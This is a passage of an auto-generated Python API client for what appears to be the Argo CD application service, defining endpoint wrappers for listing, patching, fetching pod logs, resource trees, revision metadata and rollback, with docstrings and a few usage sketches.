resource_version (str): when specified with a watch call, shows changes that occur after that particular version of a resource. [optional]
selector (str): the selector to restrict the returned list to applications with matching labels. [optional]
repo (str): the repoURL to restrict the returned list of applications. [optional]
_return_http_data_only (bool): response data without HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1ApplicationList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.application_service_list = _Endpoint(
settings={
'response_type': (V1alpha1ApplicationList,),
'auth': [],
'endpoint_path': '/api/v1/applications',
'operation_id': 'application_service_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'refresh',
'project',
'resource_version',
'selector',
'repo',
],
'required': [],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'refresh':
(str,),
'project':
([str],),
'resource_version':
(str,),
'selector':
(str,),
'repo':
(str,),
},
'attribute_map': {
'name': 'name',
'refresh': 'refresh',
'project': 'project',
'resource_version': 'resourceVersion',
'selector': 'selector',
'repo': 'repo',
},
'location_map': {
'name': 'query',
'refresh': 'query',
'project': 'query',
'resource_version': 'query',
'selector': 'query',
'repo': 'query',
},
'collection_format_map': {
'project': 'multi',
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_list
)
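# Illustrative: list applications restricted to one project and a label
# selector (project and selector values are assumed):
# apps = api.application_service_list(project=['default'], selector='team=web')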
def __application_service_list_resource_actions(
self,
name,
**kwargs
):
"""ListResourceActions returns list of resource actions # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_list_resource_actions(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
namespace (str): [optional]
resource_name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
_return_http_data_only (bool): response data without HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ApplicationResourceActionsListResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_list_resource_actions = _Endpoint(
settings={
'response_type': (ApplicationResourceActionsListResponse,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/resource/actions',
'operation_id': 'application_service_list_resource_actions',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'namespace',
'resource_name',
'version',
'group',
'kind',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'namespace':
(str,),
'resource_name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
},
'attribute_map': {
'name': 'name',
'namespace': 'namespace',
'resource_name': 'resourceName',
'version': 'version',
'group': 'group',
'kind': 'kind',
},
'location_map': {
'name': 'path',
'namespace': 'query',
'resource_name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_list_resource_actions
)
def __application_service_list_resource_events(
self,
name,
**kwargs
):
"""ListResourceEvents returns a list of event resources # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_list_resource_events(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
resource_namespace (str): [optional]
resource_name (str): [optional]
resource_uid (str): [optional]
_return_http_data_only (bool): response data without HTTP status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (int/float/tuple): timeout setting for this request. If
one number is provided, it will be the total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done on the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done on the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1EventList
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_list_resource_events = _Endpoint(
settings={
'response_type': (V1EventList,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/events',
'operation_id': 'application_service_list_resource_events',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'resource_namespace',
'resource_name',
'resource_uid',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'resource_namespace':
(str,),
'resource_name':
(str,),
'resource_uid':
(str,),
},
'attribute_map': {
'name': 'name',
'resource_namespace': 'resourceNamespace',
'resource_name': 'resourceName',
'resource_uid': 'resourceUID',
},
'location_map': {
'name': 'path',
'resource_namespace': 'query',
'resource_name': 'query',
'resource_uid': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_list_resource_events
)
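        # Usage sketch: events can be scoped to one Kubernetes object through the
        # optional query parameters (hypothetical values; `api` as above):
        #
        #     events = api.application_service_list_resource_events(
        #         'guestbook',
        #         resource_namespace='default',
        #         resource_name='guestbook-ui',
        #     )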
def __application_service_managed_resources(
self,
application_name,
**kwargs
):
"""ManagedResources returns list of managed resources # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_managed_resources(application_name, async_req=True)
>>> result = thread.get()
Args:
application_name (str):
Keyword Args:
namespace (str): [optional]
name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ApplicationManagedResourcesResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['application_name'] = \
application_name
return self.call_with_http_info(**kwargs)
self.application_service_managed_resources = _Endpoint(
settings={
'response_type': (ApplicationManagedResourcesResponse,),
'auth': [],
'endpoint_path': '/api/v1/applications/{applicationName}/managed-resources',
'operation_id': 'application_service_managed_resources',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'application_name',
'namespace',
'name',
'version',
'group',
'kind',
],
'required': [
'application_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'application_name':
(str,),
'namespace':
(str,),
'name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
},
'attribute_map': {
'application_name': 'applicationName',
'namespace': 'namespace',
'name': 'name',
'version': 'version',
'group': 'group',
'kind': 'kind',
},
'location_map': {
'application_name': 'path',
'namespace': 'query',
'name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_managed_resources
)
def __application_service_patch(
self,
name,
body,
**kwargs
):
"""Patch patch an application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_patch(name, body, async_req=True)
>>> result = thread.get()
Args:
name (str):
body (ApplicationApplicationPatchRequest):
Keyword Args:
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1Application
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_patch = _Endpoint(
settings={
'response_type': (V1alpha1Application,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}',
'operation_id': 'application_service_patch',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'name',
'body',
],
'required': [
'name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'body':
(ApplicationApplicationPatchRequest,),
},
'attribute_map': {
'name': 'name',
},
'location_map': {
'name': 'path',
'body': 'body',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_patch
)
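        # Usage sketch: the patch document and its type travel inside the request
        # model (field names assumed from the generated models, not verified here):
        #
        #     body = ApplicationApplicationPatchRequest(
        #         patch='{"spec": {"source": {"targetRevision": "v1.2.3"}}}',
        #         patch_type='merge',
        #     )
        #     app = api.application_service_patch('guestbook', body)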
def __application_service_patch_resource(
self,
name,
body,
**kwargs
):
"""PatchResource patch single application resource # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_patch_resource(name, body, async_req=True)
>>> result = thread.get()
Args:
name (str):
body (str):
Keyword Args:
namespace (str): [optional]
resource_name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
patch_type (str): [optional]
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
ApplicationApplicationResourceResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['body'] = \
body
return self.call_with_http_info(**kwargs)
self.application_service_patch_resource = _Endpoint(
settings={
'response_type': (ApplicationApplicationResourceResponse,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/resource',
'operation_id': 'application_service_patch_resource',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'name',
'body',
'namespace',
'resource_name',
'version',
'group',
'kind',
'patch_type',
],
'required': [
'name',
'body',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'body':
(str,),
'namespace':
(str,),
'resource_name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
'patch_type':
(str,),
},
'attribute_map': {
'name': 'name',
'namespace': 'namespace',
'resource_name': 'resourceName',
'version': 'version',
'group': 'group',
'kind': 'kind',
'patch_type': 'patchType',
},
'location_map': {
'name': 'path',
'body': 'body',
'namespace': 'query',
'resource_name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
'patch_type': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json'
]
},
api_client=api_client,
callable=__application_service_patch_resource
)
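        # Usage sketch: unlike application_service_patch, the resource-level patch
        # takes the raw patch document as a plain string body, with the target
        # object selected via query parameters (hypothetical values):
        #
        #     resp = api.application_service_patch_resource(
        #         'guestbook',
        #         '{"metadata": {"labels": {"patched": "true"}}}',
        #         namespace='default', resource_name='guestbook-ui',
        #         group='apps', version='v1', kind='Deployment',
        #         patch_type='merge',  # accepted values depend on the server
        #     )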
def __application_service_pod_logs(
self,
name,
pod_name,
**kwargs
):
"""PodLogs returns stream of log entries for the specified pod. Pod # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_pod_logs(name, pod_name, async_req=True)
>>> result = thread.get()
Args:
name (str):
pod_name (str):
Keyword Args:
namespace (str): [optional]
container (str): [optional]
since_seconds (str): [optional]
            since_time_seconds (str): Represents seconds of UTC time since Unix epoch 1970-01-01T00:00:00Z. Must be from 0001-01-01T00:00:00Z to 9999-12-31T23:59:59Z inclusive. [optional]
            since_time_nanos (int): Non-negative fractions of a second at nanosecond resolution. Negative second values with fractions must still have non-negative nanos values that count forward in time. Must be from 0 to 999,999,999 inclusive. This field may be limited in precision depending on context. [optional]
tail_lines (str): [optional]
follow (bool): [optional]
until_time (str): [optional]
filter (str): [optional]
kind (str): [optional]
group (str): [optional]
resource_name (str): [optional]
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
StreamResultOfApplicationLogEntry
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['pod_name'] = \
pod_name
return self.call_with_http_info(**kwargs)
self.application_service_pod_logs = _Endpoint(
settings={
'response_type': (StreamResultOfApplicationLogEntry,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/pods/{podName}/logs',
'operation_id': 'application_service_pod_logs',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'pod_name',
'namespace',
'container',
'since_seconds',
'since_time_seconds',
'since_time_nanos',
'tail_lines',
'follow',
'until_time',
'filter',
'kind',
'group',
'resource_name',
],
'required': [
'name',
'pod_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'pod_name':
(str,),
'namespace':
(str,),
'container':
(str,),
'since_seconds':
(str,),
'since_time_seconds':
(str,),
'since_time_nanos':
(int,),
'tail_lines':
(str,),
'follow':
(bool,),
'until_time':
(str,),
'filter':
(str,),
'kind':
(str,),
'group':
(str,),
'resource_name':
(str,),
},
'attribute_map': {
'name': 'name',
'pod_name': 'podName',
'namespace': 'namespace',
'container': 'container',
'since_seconds': 'sinceSeconds',
'since_time_seconds': 'sinceTime.seconds',
'since_time_nanos': 'sinceTime.nanos',
'tail_lines': 'tailLines',
'follow': 'follow',
'until_time': 'untilTime',
'filter': 'filter',
'kind': 'kind',
'group': 'group',
'resource_name': 'resourceName',
},
'location_map': {
'name': 'path',
'pod_name': 'path',
'namespace': 'query',
'container': 'query',
'since_seconds': 'query',
'since_time_seconds': 'query',
'since_time_nanos': 'query',
'tail_lines': 'query',
'follow': 'query',
'until_time': 'query',
'filter': 'query',
'kind': 'query',
'group': 'query',
'resource_name': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_pod_logs
)
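        # Usage sketch: since this endpoint streams log entries, long-lived
        # follow calls are typically made with _preload_content=False so the raw
        # urllib3.HTTPResponse can be read incrementally (hypothetical pod name):
        #
        #     resp = api.application_service_pod_logs(
        #         'guestbook', 'guestbook-ui-12345',
        #         namespace='default', follow=True, tail_lines='100',
        #         _preload_content=False,
        #     )
        #     for line in resp:       # one JSON-framed log entry per line
        #         print(line)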
def __application_service_pod_logs2(
self,
name,
**kwargs
):
"""PodLogs returns stream of log entries for the specified pod. Pod # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_pod_logs2(name, async_req=True)
>>> result = thread.get()
Args:
name (str):
Keyword Args:
namespace (str): [optional]
pod_name (str): [optional]
container (str): [optional]
since_seconds (str): [optional]
            since_time_seconds (str): Represents seconds of UTC time since Unix epoch 1970-01-01T00:00:00Z. Must be from 0001-01-01T00:00:00Z to 9999-12-31T23:59:59Z inclusive. [optional]
            since_time_nanos (int): Non-negative fractions of a second at nanosecond resolution. Negative second values with fractions must still have non-negative nanos values that count forward in time. Must be from 0 to 999,999,999 inclusive. This field may be limited in precision depending on context. [optional]
tail_lines (str): [optional]
follow (bool): [optional]
until_time (str): [optional]
filter (str): [optional]
kind (str): [optional]
group (str): [optional]
resource_name (str): [optional]
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
StreamResultOfApplicationLogEntry
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
return self.call_with_http_info(**kwargs)
self.application_service_pod_logs2 = _Endpoint(
settings={
'response_type': (StreamResultOfApplicationLogEntry,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/logs',
'operation_id': 'application_service_pod_logs2',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'namespace',
'pod_name',
'container',
'since_seconds',
'since_time_seconds',
'since_time_nanos',
'tail_lines',
'follow',
'until_time',
'filter',
'kind',
'group',
'resource_name',
],
'required': [
'name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'namespace':
(str,),
'pod_name':
(str,),
'container':
(str,),
'since_seconds':
(str,),
'since_time_seconds':
(str,),
'since_time_nanos':
(int,),
'tail_lines':
(str,),
'follow':
(bool,),
'until_time':
(str,),
'filter':
(str,),
'kind':
(str,),
'group':
(str,),
'resource_name':
(str,),
},
'attribute_map': {
'name': 'name',
'namespace': 'namespace',
'pod_name': 'podName',
'container': 'container',
'since_seconds': 'sinceSeconds',
'since_time_seconds': 'sinceTime.seconds',
'since_time_nanos': 'sinceTime.nanos',
'tail_lines': 'tailLines',
'follow': 'follow',
'until_time': 'untilTime',
'filter': 'filter',
'kind': 'kind',
'group': 'group',
'resource_name': 'resourceName',
},
'location_map': {
'name': 'path',
'namespace': 'query',
'pod_name': 'query',
'container': 'query',
'since_seconds': 'query',
'since_time_seconds': 'query',
'since_time_nanos': 'query',
'tail_lines': 'query',
'follow': 'query',
'until_time': 'query',
'filter': 'query',
'kind': 'query',
'group': 'query',
'resource_name': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_pod_logs2
)
def __application_service_resource_tree(
self,
application_name,
**kwargs
):
"""ResourceTree returns resource tree # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_resource_tree(application_name, async_req=True)
>>> result = thread.get()
Args:
application_name (str):
Keyword Args:
namespace (str): [optional]
name (str): [optional]
version (str): [optional]
group (str): [optional]
kind (str): [optional]
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1ApplicationTree
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['application_name'] = \
application_name
return self.call_with_http_info(**kwargs)
self.application_service_resource_tree = _Endpoint(
settings={
'response_type': (V1alpha1ApplicationTree,),
'auth': [],
'endpoint_path': '/api/v1/applications/{applicationName}/resource-tree',
'operation_id': 'application_service_resource_tree',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'application_name',
'namespace',
'name',
'version',
'group',
'kind',
],
'required': [
'application_name',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'application_name':
(str,),
'namespace':
(str,),
'name':
(str,),
'version':
(str,),
'group':
(str,),
'kind':
(str,),
},
'attribute_map': {
'application_name': 'applicationName',
'namespace': 'namespace',
'name': 'name',
'version': 'version',
'group': 'group',
'kind': 'kind',
},
'location_map': {
'application_name': 'path',
'namespace': 'query',
'name': 'query',
'version': 'query',
'group': 'query',
'kind': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_resource_tree
)
def __application_service_revision_metadata(
self,
name,
revision,
**kwargs
):
"""Get the meta-data (author, date, tags, message) for a specific revision of the application # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_revision_metadata(name, revision, async_req=True)
>>> result = thread.get()
Args:
name (str): the application's name
revision (str): the revision of the app
Keyword Args:
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
                be a pair (tuple) of (connection, read) timeouts.
                Default is None.
            _check_input_type (bool): specifies if type checking
                should be done on the data sent to the server.
                Default is True.
            _check_return_type (bool): specifies if type checking
                should be done on the data received from the server.
                Default is True.
            _host_index (int/None): specifies the index of the server
                that we want to use.
                Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
V1alpha1RevisionMetadata
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['name'] = \
name
kwargs['revision'] = \
revision
return self.call_with_http_info(**kwargs)
self.application_service_revision_metadata = _Endpoint(
settings={
'response_type': (V1alpha1RevisionMetadata,),
'auth': [],
'endpoint_path': '/api/v1/applications/{name}/revisions/{revision}/metadata',
'operation_id': 'application_service_revision_metadata',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'name',
'revision',
],
'required': [
'name',
'revision',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'name':
(str,),
'revision':
(str,),
},
'attribute_map': {
'name': 'name',
'revision': 'revision',
},
'location_map': {
'name': 'path',
'revision': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [],
},
api_client=api_client,
callable=__application_service_revision_metadata
)
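        # Usage sketch: both parameters are path segments, so the call needs the
        # application name plus a concrete revision (hypothetical values):
        #
        #     meta = api.application_service_revision_metadata('guestbook', 'abc1234')
        #     # meta should carry author, date, tags and message for that revision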
def __application_service_rollback(
self,
name,
body,
**kwargs
):
"""Rollback syncs an application to its target state # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.application_service_rollback(name, body, async_req=True)
>>> result = thread.get()
Args:
name (str):
body (ApplicationApplicationRollbackRequest):
Keyword Args:
            _return_http_data_only (bool): return the response data without the
                HTTP status code and headers. Default is True.
            _preload_content (bool): if False, the urllib3.HTTPResponse object
                will be returned without reading/decoding response data.
                Default is True.
            _request_timeout (int/float/tuple): timeout setting for this request. If
                one number is provided, it is the total request timeout. It can also
